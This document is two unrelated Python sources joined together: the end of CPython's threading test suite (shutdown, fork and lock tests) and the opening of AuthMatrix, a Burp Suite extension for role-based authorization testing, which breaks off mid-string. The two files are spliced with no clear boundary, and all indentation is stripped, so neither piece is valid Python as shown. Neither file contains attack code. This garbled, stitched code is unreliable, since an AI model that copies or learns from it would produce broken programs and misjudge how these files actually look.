ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
import subprocess
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
rc = p.returncode
self.assertFalse(rc == 2, "interpreted was blocked")
self.assertTrue(rc == 0,
"Unexpected error: " + repr(stderr))
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
import subprocess
p = subprocess.Popen([sys.executable, "-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
self.assertEqual(stdout.strip(),
"Woke up, sleep function is: <built-in function sleep>")
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEqual(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEqual(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" + script
import subprocess
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
p.stdout.close()
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
import os
if not hasattr(os, 'fork'):
return
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
import os
if not hasattr(os, 'fork'):
return
# Skip platforms with known problems forking from a worker thread.
# See http://bugs.python.org/issue3863.
if sys.platform in ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'os2emx'):
print >>sys.stderr, ('Skipping test_3_join_in_forked_from_thread'
' due to known OS bugs on'), sys.platform
return
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
def test_main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
test_main()
|
AuthMatrix.py | # Copyright (c) 2016 Mick Ayzenberg - Security Innovation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from burp import IBurpExtender
from burp import ITab
from burp import IMessageEditorController
from burp import IContextMenuFactory
from burp import IHttpRequestResponse
from java.awt import Component;
from java.awt import GridBagLayout;
from java.awt import GridBagConstraints;
from java.awt import Dimension;
from java.util import ArrayList;
from java.lang import Boolean;
from javax.swing import JScrollPane;
from javax.swing import JSplitPane;
from javax.swing import JTabbedPane;
from javax.swing import JPanel;
from javax.swing import JButton;
from javax.swing import JTable;
from javax.swing import JOptionPane;
from javax.swing import JMenuItem;
from javax.swing import JCheckBox;
from javax.swing import JComboBox;
from javax.swing import DefaultCellEditor;
from javax.swing import JLabel;
from javax.swing import JFileChooser;
from javax.swing import JPopupMenu;
from javax.swing import JTextField;
from javax.swing import TransferHandler;
from javax.swing import DropMode;
from javax.swing import JSeparator;
from javax.swing import SwingConstants;
from javax.swing import JList
from javax.swing import AbstractCellEditor
from javax.swing import Timer
from java.awt.datatransfer import StringSelection;
from java.awt.datatransfer import DataFlavor;
from javax.swing.table import AbstractTableModel;
from javax.swing.table import TableCellRenderer;
from javax.swing.table import JTableHeader;
from javax.swing.table import TableCellEditor
from java.awt import Color;
from java.awt import Font;
from java.awt.event import MouseAdapter;
from java.awt.event import ActionListener;
from java.awt.event import ItemListener;
from java.awt.event import ItemEvent;
from javax.swing.event import DocumentListener;
from javax.swing.event import ChangeListener;
import java.lang;
from org.python.core.util import StringUtil
from threading import Lock
from threading import Thread
import traceback
import re
import urllib
import hashlib
import json
import base64
import random
import string
AUTHMATRIX_VERSION = "0.8.2"
class BurpExtender(IBurpExtender, ITab, IMessageEditorController, IContextMenuFactory):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our Burp callbacks object
self._callbacks = callbacks
# obtain an Burp extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("AuthMatrix - v"+AUTHMATRIX_VERSION)
# DB that holds everything users, roles, and messages
self._db = MatrixDB()
# For saving/loading config
self._fc = JFileChooser()
# Used by inner classes
selfExtender = self
self._selectedColumn = -1
self._selectedRow = -1
# Table of Chain entries (NOTE: must be instantiated before userTable since its referenced)
self._chainTable = ChainTable(model = ChainTableModel(self))
chainScrollPane = JScrollPane(self._chainTable)
self._chainTable.redrawTable()
# Table of User entries
self._userTable = UserTable(model = UserTableModel(self))
roleScrollPane = JScrollPane(self._userTable)
self._userTable.redrawTable()
# Table of Request (AKA Message) entries
self._messageTable = MessageTable(model = MessageTableModel(self))
messageScrollPane = JScrollPane(self._messageTable)
self._messageTable.redrawTable()
# Set Messages to reorderable
self._messageTable.setDragEnabled(True)
self._messageTable.setDropMode(DropMode.INSERT_ROWS)
self._messageTable.setTransferHandler(RowTransferHandler(self._messageTable))
# Set Users to reorderable
self._userTable.setDragEnabled(True)
self._userTable.setDropMode(DropMode.INSERT_ROWS)
self._userTable.setTransferHandler(RowTransferHandler(self._userTable))
# Semi-Generic Popup stuff
def addPopup(component, popup):
class genericMouseListener(MouseAdapter):
def mousePressed(self, e):
if e.isPopupTrigger():
self.showMenu(e)
def mouseReleased(self, e):
if e.isPopupTrigger():
self.showMenu(e)
def showMenu(self, e):
# NOTE: testing if .locked is ok here since its a manual operation
if selfExtender._db.lock.locked():
return
if type(component) is JTableHeader:
table = component.getTable()
column = component.columnAtPoint(e.getPoint())
if (type(table) is MessageTable
and column >= selfExtender._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT
or type(table) is UserTable
and column >= selfExtender._db.STATIC_USER_TABLE_COLUMN_COUNT):
selfExtender._selectedColumn = column
else:
return
else:
selfExtender._selectedRow = component.rowAtPoint(e.getPoint())
popup.show(e.getComponent(), e.getX(), e.getY())
component.addMouseListener(genericMouseListener())
class actionRunMessage(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._messageTable.getSelectedRows():
indexes = [selfExtender._db.getMessageByRow(selfExtender._selectedRow)._index]
else:
indexes = [selfExtender._db.getMessageByRow(rowNum)._index for rowNum in selfExtender._messageTable.getSelectedRows()]
t = Thread(target=selfExtender.runMessagesThread, args = [indexes])
t.start()
selfExtender._selectedColumn = -1
# Redrawing the table happens in colorcode within the thread
class actionToggleEnableUser(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._userTable.getSelectedRows():
usersArray = [selfExtender._db.getUserByRow(selfExtender._selectedRow)]
else:
usersArray = [selfExtender._db.getUserByRow(rowNum) for rowNum in selfExtender._userTable.getSelectedRows()]
for userEntry in usersArray:
userEntry.toggleEnabled()
selfExtender._selectedColumn = -1
selfExtender._userTable.redrawTable()
class actionToggleEnableMessage(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._messageTable.getSelectedRows():
messagesArray = [selfExtender._db.getMessageByRow(selfExtender._selectedRow)]
else:
messagesArray = [selfExtender._db.getMessageByRow(rowNum) for rowNum in selfExtender._messageTable.getSelectedRows()]
for messageEntry in messagesArray:
messageEntry.toggleEnabled()
selfExtender._selectedColumn = -1
selfExtender._messageTable.redrawTable()
class actionToggleEnableChain(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._chainTable.getSelectedRows():
chainArray = [selfExtender._db.getChainByRow(selfExtender._selectedRow)]
else:
chainArray = [selfExtender._db.getChainByRow(rowNum) for rowNum in selfExtender._chainTable.getSelectedRows()]
for chainEntry in chainArray:
chainEntry.toggleEnabled()
selfExtender._selectedColumn = -1
selfExtender._chainTable.redrawTable()
class actionRemoveMessage(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._messageTable.getSelectedRows():
indexes = [selfExtender._db.getMessageByRow(selfExtender._selectedRow)._index]
else:
indexes = [selfExtender._db.getMessageByRow(rowNum)._index for rowNum in selfExtender._messageTable.getSelectedRows()]
for i in indexes:
selfExtender._db.deleteMessage(i)
selfExtender._selectedColumn = -1
selfExtender._messageTable.redrawTable()
selfExtender._chainTable.redrawTable()
class actionRemoveUser(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._userTable.getSelectedRows():
indexes = [selfExtender._db.getUserByRow(selfExtender._selectedRow)._index]
else:
indexes = [selfExtender._db.getUserByRow(rowNum)._index for rowNum in selfExtender._userTable.getSelectedRows()]
for i in indexes:
selfExtender._db.deleteUser(i)
selfExtender._selectedColumn = -1
selfExtender._userTable.redrawTable()
selfExtender._chainTable.redrawTable()
class actionRemoveChain(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._chainTable.getSelectedRows():
indexes = [selfExtender._db.getChainByRow(selfExtender._selectedRow)._index]
else:
indexes = [selfExtender._db.getChainByRow(rowNum)._index for rowNum in selfExtender._chainTable.getSelectedRows()]
for i in indexes:
selfExtender._db.deleteChain(i)
selfExtender._selectedColumn = -1
selfExtender._chainTable.redrawTable()
class actionRemoveColumn(ActionListener):
def __init__(self, table):
self._table = table
def actionPerformed(self,e):
if selfExtender._selectedColumn >= 0:
if self._table == "u":
# Delete Role
if selfExtender._selectedColumn >= selfExtender._db.STATIC_USER_TABLE_COLUMN_COUNT + selfExtender._db.headerCount + selfExtender._db.arrayOfSVs.size():
selfExtender._db.deleteRole(selfExtender._db.getRoleByColumn(
selfExtender._selectedColumn, self._table)._index)
# Delete SV
elif selfExtender._selectedColumn >= selfExtender._db.STATIC_USER_TABLE_COLUMN_COUNT + selfExtender._db.headerCount:
selfExtender._db.deleteSV(selfExtender._selectedColumn-(selfExtender._db.STATIC_USER_TABLE_COLUMN_COUNT+selfExtender._db.headerCount))
# Delete Header
elif selfExtender._selectedColumn >= selfExtender._db.STATIC_USER_TABLE_COLUMN_COUNT:
selfExtender._db.deleteHeader(selfExtender._selectedColumn-selfExtender._db.STATIC_USER_TABLE_COLUMN_COUNT)
elif self._table == "m":
# Delete Role
selfExtender._db.deleteRole(selfExtender._db.getRoleByColumn(
selfExtender._selectedColumn, self._table)._index)
selfExtender._selectedColumn = -1
selfExtender._userTable.redrawTable()
selfExtender._messageTable.redrawTable()
selfExtender._chainTable.redrawTable()
class actionToggleRegex(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._messageTable.getSelectedRows():
messages = [selfExtender._db.getMessageByRow(selfExtender._selectedRow)]
else:
messages = [selfExtender._db.getMessageByRow(rowNum) for rowNum in selfExtender._messageTable.getSelectedRows()]
for m in messages:
m.setFailureRegex(not m.isFailureRegex())
m.clearResults()
selfExtender._selectedColumn = -1
selfExtender._messageTable.redrawTable()
class actionChangeRegexes(ActionListener):
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._messageTable.getSelectedRows():
messages = [selfExtender._db.getMessageByRow(selfExtender._selectedRow)]
else:
messages = [selfExtender._db.getMessageByRow(rowNum) for rowNum in selfExtender._messageTable.getSelectedRows()]
newRegex,failureRegex = selfExtender.changeRegexPopup()
if newRegex:
for message in messages:
message._regex = newRegex
message.setFailureRegex(failureRegex)
# Add to list of regexes if its not already there
if newRegex not in selfExtender._db.arrayOfRegexes:
selfExtender._db.arrayOfRegexes.append(newRegex)
selfExtender._selectedColumn = -1
selfExtender._messageTable.redrawTable()
class actionChangeDomain(ActionListener):
def replaceDomain(self, requestResponse, newDomain):
requestInfo = selfExtender._helpers.analyzeRequest(requestResponse)
reqBody = requestResponse.getRequest()[requestInfo.getBodyOffset():]
newHeaders = ModifyMessage.getNewHeaders(requestInfo, None, ["Host: "+newDomain])
newreq = selfExtender._helpers.buildHttpMessage(newHeaders, reqBody)
return newreq
def actionPerformed(self,e):
if selfExtender._selectedRow >= 0:
if selfExtender._selectedRow not in selfExtender._messageTable.getSelectedRows():
messages = [selfExtender._db.getMessageByRow(selfExtender._selectedRow)]
else:
messages = [selfExtender._db.getMessageByRow(rowNum) for rowNum in selfExtender._messageTable.getSelectedRows()]
# Autofill the service values if they are all the same
uniqueServices = [(message._requestResponse.getHttpService().getHost(),
message._requestResponse.getHttpService().getPort(),
message._requestResponse.getHttpService().getProtocol()) for message in messages]
service = None if len(set(uniqueServices)) != 1 else messages[0]._requestResponse.getHttpService()
ok, host, port, tls, replaceHost = selfExtender.changeDomainPopup(service)
if ok and host:
if not port or not port.isdigit():
port = 443 if tls else 80
for m in messages:
if replaceHost:
request = self.replaceDomain(m._requestResponse, host)
else:
request = m._requestResponse.getRequest()
# TODO save the Response?
m._requestResponse = RequestResponseStored(selfExtender, host, int(port), "https" if tls else "http", request)
m.clearResults()
selfExtender._selectedColumn = -1
selfExtender._messageTable.redrawTable()
class actionSetToggleForRole(ActionListener):
def __init__(self, enabled):
self._enabled = enabled
def actionPerformed(self, e):
if selfExtender._selectedColumn >= 0:
messageIndexes = [selfExtender._db.getMessageByRow(rowNum)._index for rowNum in selfExtender._messageTable.getSelectedRows()]
for messageIndex in messageIndexes:
roleIndex = selfExtender._db.getRoleByColumn(selfExtender._selectedColumn, "m")._index
selfExtender._db.setToggleForRole(messageIndex, roleIndex, self._enabled)
selfExtender._selectedColumn = -1
selfExtender._messageTable.redrawTable()
# Message Table popups
messagePopup = JPopupMenu()
addPopup(self._messageTable,messagePopup)
toggleEnabled = JMenuItem("Disable/Enable Request(s)")
toggleEnabled.addActionListener(actionToggleEnableMessage())
messagePopup.add(toggleEnabled)
messageRun = JMenuItem("Run Request(s)")
messageRun.addActionListener(actionRunMessage())
messagePopup.add(messageRun)
toggleRegex = JMenuItem("Toggle Regex Mode (Success/Failure)")
toggleRegex.addActionListener(actionToggleRegex())
messagePopup.add(toggleRegex)
changeRegex = JMenuItem("Change Regexes")
changeRegex.addActionListener(actionChangeRegexes())
messagePopup.add(changeRegex)
changeDomain = JMenuItem("Change Target Domain")
changeDomain.addActionListener(actionChangeDomain())
messagePopup.add(changeDomain)
messageRemove = JMenuItem("Remove Request(s)")
messageRemove.addActionListener(actionRemoveMessage())
messagePopup.add(messageRemove)
messageHeaderPopup = JPopupMenu()
addPopup(self._messageTable.getTableHeader(),messageHeaderPopup)
roleRemoveFromMessageTable = JMenuItem("Remove Role")
roleRemoveFromMessageTable.addActionListener(actionRemoveColumn("m"))
messageHeaderPopup.add(roleRemoveFromMessageTable)
enableToggle = JMenuItem("Bulk Select Checkboxes")
enableToggle.addActionListener(actionSetToggleForRole(True))
messageHeaderPopup.add(enableToggle)
disableToggle = JMenuItem("Bulk Unselect Checkboxes")
disableToggle.addActionListener(actionSetToggleForRole(False))
messageHeaderPopup.add(disableToggle)
# User Table popup
userPopup = JPopupMenu()
addPopup(self._userTable,userPopup)
toggleEnabled = JMenuItem("Disable/Enable User(s)")
toggleEnabled.addActionListener(actionToggleEnableUser())
userPopup.add(toggleEnabled)
userRemove = JMenuItem("Remove Users(s)")
userRemove.addActionListener(actionRemoveUser())
userPopup.add(userRemove)
userHeaderPopup = JPopupMenu()
addPopup(self._userTable.getTableHeader(),userHeaderPopup)
removeColumnFromUserTable = JMenuItem("Remove")
removeColumnFromUserTable.addActionListener(actionRemoveColumn("u"))
userHeaderPopup.add(removeColumnFromUserTable)
# Chain Table popup
chainPopup = JPopupMenu()
addPopup(self._chainTable,chainPopup)
toggleEnabled = JMenuItem("Disable/Enable Chain(s)")
toggleEnabled.addActionListener(actionToggleEnableChain())
chainPopup.add(toggleEnabled)
chainRemove = JMenuItem("Remove Chain(s)")
chainRemove.addActionListener(actionRemoveChain())
chainPopup.add(chainRemove)
# request tabs added to this tab on click in message table
self._tabs = JTabbedPane()
# Add change listener to set currentDisplayedItem
class TabChangeListener(ChangeListener):
def stateChanged(self, e):
if type(e.getSource()) == JTabbedPane and e.getSource().getSelectedIndex()>=0:
selfExtender._currentlyDisplayedItem = e.getSource().getSelectedComponent()._requestResponse
self._tabs.addChangeListener(TabChangeListener())
# Button pannel
buttons = JPanel()
self._runButton = JButton("Run", actionPerformed=self.runClick)
self._cancelButton = JButton("Cancel", actionPerformed=self.cancelClick)
self._newUserButton = JButton("New User", actionPerformed=self.getInputUserClick)
self._newRoleButton = JButton("New Role", actionPerformed=self.getInputRoleClick)
self._newHeaderButton = JButton("New Header", actionPerformed=self.newHeaderClick)
self._newChainButton = JButton("New Chain", actionPerformed=self.newChainClick)
self._newStaticValueButton = JButton("New Chain Source", actionPerformed=self.newStaticValueClick)
self._saveButton = JButton("Save", actionPerformed=self.saveClick)
self._loadButton = JButton("Load", actionPerformed=self.loadClick)
self._clearButton = JButton("Clear", actionPerformed=self.clearClick)
buttons.add(self._runButton)
buttons.add(self._cancelButton)
self._cancelButton.setEnabled(False)
separator1 = JSeparator(SwingConstants.VERTICAL)
separator1.setPreferredSize(Dimension(25,0))
buttons.add(separator1)
buttons.add(self._newUserButton)
buttons.add(self._newRoleButton)
buttons.add(self._newHeaderButton)
separator2 = JSeparator(SwingConstants.VERTICAL)
separator2.setPreferredSize(Dimension(25,0))
buttons.add(separator2)
buttons.add(self._newChainButton)
buttons.add(self._newStaticValueButton)
separator3 = JSeparator(SwingConstants.VERTICAL)
separator3.setPreferredSize(Dimension(25,0))
buttons.add(separator3)
buttons.add(self._saveButton)
buttons.add(self._loadButton)
buttons.add(self._clearButton)
# Top pane
firstPane = JSplitPane(JSplitPane.VERTICAL_SPLIT,roleScrollPane,messageScrollPane)
self._topPane = JSplitPane(JSplitPane.VERTICAL_SPLIT, firstPane, chainScrollPane)
bottomPane = JSplitPane(JSplitPane.VERTICAL_SPLIT, self._tabs, buttons)
# Main Pane
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT, self._topPane, bottomPane)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(firstPane)
callbacks.customizeUiComponent(self._topPane)
callbacks.customizeUiComponent(bottomPane)
callbacks.customizeUiComponent(messageScrollPane)
callbacks.customizeUiComponent(roleScrollPane)
callbacks.customizeUiComponent(chainScrollPane)
callbacks.customizeUiComponent(self._messageTable)
callbacks.customizeUiComponent(self._userTable)
callbacks.customizeUiComponent(self._chainTable)
callbacks.customizeUiComponent(self._tabs)
callbacks.customizeUiComponent(buttons)
self._splitpane.setResizeWeight(0.5)
firstPane.setResizeWeight(0.35)
self._topPane.setResizeWeight(0.85)
bottomPane.setResizeWeight(0.95)
# Handles checkbox, regex, and enabled coloring
# Must be bellow the customizeUiComponent calls
self._messageTable.setDefaultRenderer(Boolean, SuccessBooleanRenderer(self._messageTable.getDefaultRenderer(Boolean), self._db))
self._messageTable.setDefaultRenderer(str, RegexRenderer(self._messageTable.getDefaultRenderer(str), self._db))
self._userTable.setDefaultRenderer(str, UserEnabledRenderer(self._userTable.getDefaultRenderer(str), self._db))
self._userTable.setDefaultRenderer(Boolean, UserEnabledRenderer(self._userTable.getDefaultRenderer(Boolean), self._db))
self._chainTable.setDefaultRenderer(str, ChainEnabledRenderer(self._chainTable.getDefaultRenderer(str), self._db))
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register SendTo option
callbacks.registerContextMenuFactory(self)
return
##
## implement ITab
##
def getTabCaption(self):
return "AuthMatrix"
def getUiComponent(self):
return self._splitpane
def highlightTab(self):
currentPane = self._splitpane
previousPane = currentPane
while currentPane and not isinstance(currentPane, JTabbedPane):
previousPane = currentPane
currentPane = currentPane.getParent()
if currentPane:
index = currentPane.indexOfComponent(previousPane)
# TODO use old background instead of black (currently doesnt work)
#oldBackground = currentPane.getBackgroundAt(index)
currentPane.setBackgroundAt(index,self._db.BURP_ORANGE)
class setColorBackActionListener(ActionListener):
def actionPerformed(self, e):
currentPane.setBackgroundAt(index,Color.BLACK)
timer = Timer(5000, setColorBackActionListener())
timer.setRepeats(False)
timer.start()
##
## Creates the sendto tab in other areas of Burp
##
def createMenuItems(self, invocation):
def addRequestsToTab(e):
for messageInfo in messages:
requestInfo = self._helpers.analyzeRequest(messageInfo)
name = str(requestInfo.getMethod()).ljust(8) + requestInfo.getUrl().getPath()
# Grab regex from response
regex = "^HTTP/1\\.1 200 OK"
response = messageInfo.getResponse()
if response:
responseInfo=self._helpers.analyzeResponse(response)
if len(responseInfo.getHeaders()):
responseCodeHeader = responseInfo.getHeaders()[0]
regex = "^"+re.escape(responseCodeHeader)
# Must create a new RequestResponseStored object since modifying the original messageInfo
# from its source (such as Repeater) changes this saved object. MessageInfo is a reference, not a copy
messageIndex = self._db.createNewMessage(RequestResponseStored(self,requestResponse=messageInfo), name, regex)
self._messageTable.redrawTable()
self._chainTable.redrawTable()
self.highlightTab()
class UserCookiesActionListener(ActionListener):
def __init__(self, currentUser, extender):
self.currentUser=currentUser
self.extender = extender
def actionPerformed(self, e):
for messageInfo in messages:
cookieVal = ""
requestInfo = self.extender._helpers.analyzeRequest(messageInfo)
for header in requestInfo.getHeaders():
cookieStr = "Cookie: "
if header.startswith(cookieStr):
cookieVal = header[len(cookieStr):]
# Grab Set-Cookie headers from the responses as well
response = messageInfo.getResponse()
if response:
responseInfo = self.extender._helpers.analyzeResponse(response)
responseCookies = responseInfo.getCookies()
newCookies = "; ".join([x.getName()+"="+x.getValue() for x in responseCookies])
cookieVal = ModifyMessage.cookieReplace(cookieVal,newCookies)
self.currentUser._cookies = cookieVal
self.extender._userTable.redrawTable()
self.extender.highlightTab()
ret = []
messages = invocation.getSelectedMessages()
# Check if the messages in the target tree have a response
valid = True
if invocation.getInvocationContext() == invocation.CONTEXT_TARGET_SITE_MAP_TREE:
for selected in messages:
if not selected.getResponse():
valid = False
if valid:
menuItem = JMenuItem("Send request(s) to AuthMatrix");
menuItem.addActionListener(addRequestsToTab)
ret.append(menuItem)
if len(messages)==1:
# Send cookies to user:
for user in self._db.getUsersInOrderByRow():
menuItem = JMenuItem("Send cookies to AuthMatrix user: "+user._name);
menuItem.addActionListener(UserCookiesActionListener(user, self))
ret.append(menuItem)
return ret
##
## implement IMessageEditorController
## this allows our request/response viewers to obtain details about the messages being displayed
##
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
##
## Actions on Bottom Row Button Clicks
##
def getInputUserClick(self, e):
newUser = JOptionPane.showInputDialog(self._splitpane,"Enter New User:")
if newUser:
self._db.getOrCreateUser(newUser)
self._userTable.redrawTable()
# redraw Message Table since it adds a new SingleUser Role
self._messageTable.redrawTable()
self._chainTable.redrawTable()
def getInputRoleClick(self, e):
newRole = JOptionPane.showInputDialog(self._splitpane,"Enter New Role:")
if newRole:
self._db.getOrCreateRole(newRole)
self._userTable.redrawTable()
self._messageTable.redrawTable()
def newChainClick(self,e):
self._db.createNewChain()
self._chainTable.redrawTable()
def newHeaderClick(self, e):
self._db.addNewHeader()
self._userTable.redrawTable()
def newStaticValueClick(self, e):
newSV = JOptionPane.showInputDialog(self._splitpane,"Enter a label for the new Chain Source:")
if newSV:
self._db.addNewSV(newSV)
self._userTable.redrawTable()
self._chainTable.redrawTable()
def cancelClick(self,e):
self._runCancelled = True
self._cancelButton.setEnabled(False)
def saveClick(self, e):
# Update original requests with any user changes
self._messageTable.updateMessages()
returnVal = self._fc.showSaveDialog(self._splitpane)
if returnVal == JFileChooser.APPROVE_OPTION:
f = self._fc.getSelectedFile()
if f.exists():
result = JOptionPane.showConfirmDialog(self._splitpane, "The file exists, overwrite?", "Existing File", JOptionPane.YES_NO_OPTION)
if result != JOptionPane.YES_OPTION:
return
fileName = f.getPath()
# TODO Potential bug here. Check if the value being written is 0 before opening
# TODO add a try catch here?
jsonValue = self._db.getSaveableJson()
if jsonValue:
fileout = open(fileName,'w')
fileout.write(jsonValue)
fileout.close()
else:
# TODO popup errors instead of prints
print "Error: Save Failed. JSON empty."
# TODO currently this will save the config to burp, but not to a specific project
# Will also need an export and loadFromFile feature if this is ever implemented
# self._callbacks.saveExtensionSetting("AUTHMATRIX", self._db.getSaveableJson())
def loadClick(self,e):
returnVal = self._fc.showOpenDialog(self._splitpane)
if returnVal == JFileChooser.APPROVE_OPTION:
f = self._fc.getSelectedFile()
fileName = f.getPath()
filein = open(fileName,'r')
jsonText = filein.read()
filein.close()
# Check if using on older state file compatible with v0.5.2 or greater
if not jsonText or jsonText[0] !="{":
warning = """
CAUTION:
Loading a saved configuration prior to v0.6.3 deserializes data into Jython objects.
